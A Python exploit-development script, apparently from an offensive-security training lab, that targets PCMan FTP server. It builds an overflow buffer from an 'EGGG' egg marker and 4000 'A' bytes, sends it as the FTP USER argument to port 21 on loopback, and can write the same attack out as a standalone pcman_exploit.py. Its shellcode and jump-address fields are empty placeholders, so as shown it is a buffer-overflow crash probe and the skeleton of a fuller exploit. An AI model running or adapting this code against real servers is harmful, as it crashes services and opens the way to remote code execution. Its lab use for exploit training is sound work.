import socket, sys, struct, subprocess, os
from threading import Thread
from functools import wraps
from time import sleep
def run_async(func):
    """
    Decorator: calling the wrapped function starts it on a fresh Thread and
    returns that Thread object instead of the function's result. The caller
    owns the thread and is expected to join() it.

    Example::

        @run_async
        def task1():
            do_something

        @run_async
        def task2():
            do_something_too

        t1 = task1()
        t2 = task2()
        ...
        t1.join()
        t2.join()
    """
    @wraps(func)
    def launcher(*args, **kwargs):
        # Arguments are forwarded untouched to the target running on the new thread.
        worker = Thread(target=func, args=args, kwargs=kwargs)
        worker.start()
        return worker

    return launcher
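class Exploit():
    """
    Holder for the test buffer sent as an FTP USER argument to 127.0.0.1:21.

    ``exploit()`` sends the joined ``buffer`` live on a background thread;
    ``save()`` writes a standalone script that sends the same bytes. The
    ``shellcode``, ``jmpesp``, ``prebuff`` and ``postbuff`` attributes are
    initialised to '' and are not read by any method of this class.
    """
    def __init__(self):
        # Marker placed (twice) at the head of the buffer; see get_egg/set_egg.
        self.egg = 'EGGG'
        # Placeholders kept for callers; nothing in this class reads them.
        self.shellcode = ''
        self.jmpesp = ''
        self.prebuff = ''
        self.postbuff = ''
        # Chunks joined in order to form the USER argument.
        self.buffer = [self.egg * 2, "A" * 4000]
        # Only read by is_filebased(); no method here ever sets it to True.
        self.file_based = False
        self.filename = ''
        # Path of the target binary; only returned by get_command().
        self.command = 'C:\\Users\\offsec\\Desktop\\PCMan\\PCManFTPD2.exe'

    @run_async
    def exploit(self):
        """
        Connect to 127.0.0.1:21 and send the buffer as a USER command.

        Runs on its own thread (see run_async): the caller receives the
        Thread object and should join() it. The target address and port are
        fixed to loopback. The socket is closed even if connect() or the
        send raises.
        """
        sleep(1)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print('[*]Connecting to socket')
        try:
            sock.connect(('127.0.0.1', 21))
            # Test 1
            message = "USER " + ''.join(self.buffer) + " \r\n"
            print('[*]Sending exploit')
            # sendall() loops until every byte is written; send() may stop short
            # and silently truncate the message.
            sock.sendall(message)
        finally:
            sock.close()

    def string_to_hexescaped(self, s):
        """
        Convert each character of a string to a printed hex escape and join them.

        @param s: input string
        @return: printable hex-escaped string, e.g. 'AB' -> '\\x41\\x42'
        """
        return ''.join('\\x%02x' % ord(c) for c in s)

    def get_buffer(self):
        """Return the list of buffer chunks."""
        return self.buffer

    def set_buffer(self, buff):
        """Replace the list of buffer chunks."""
        self.buffer = buff

    def get_buffer_length(self):
        """Return the length of the joined buffer."""
        return len(''.join(self.buffer))

    def get_egg(self):
        """Return the egg marker string."""
        return self.egg

    def set_egg(self, egg):
        """Set the egg marker string (does not rebuild self.buffer)."""
        self.egg = egg

    def get_filename(self):
        """Return the configured filename ('' by default)."""
        return self.filename

    def set_filename(self, filename):
        """Set the configured filename."""
        self.filename = filename

    def is_filebased(self):
        """Return the file_based flag (always False unless set externally)."""
        return self.file_based

    def get_command(self):
        """Return the hard-coded target binary path."""
        return self.command

    def save(self):
        """
        Write 'pcman_exploit.py' in the current working directory, overwriting
        any existing file, with a standalone script (Python 2 print syntax)
        that sends the current buffer to 127.0.0.1:21.
        """
        payload = self.string_to_hexescaped(''.join(self.buffer))
        lines = [
            "import socket\n\n",
            "sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n",
            # The two print lines previously lacked a trailing newline, so
            # they fused with the next statement and the generated script
            # was a syntax error.
            "print '[*]Connecting to socket'\n",
            "sock.connect(('127.0.0.1',21))\n",
            "message = 'USER " + payload + " \\r\\n'\n",
            "print '[*]Sending exploit'\n",
            "sock.send(message)\n",
            "sock.close()\n",
        ]
        # `with` closes the file even if write() raises.
        with open('pcman_exploit.py', 'w') as f:
            f.write(''.join(lines))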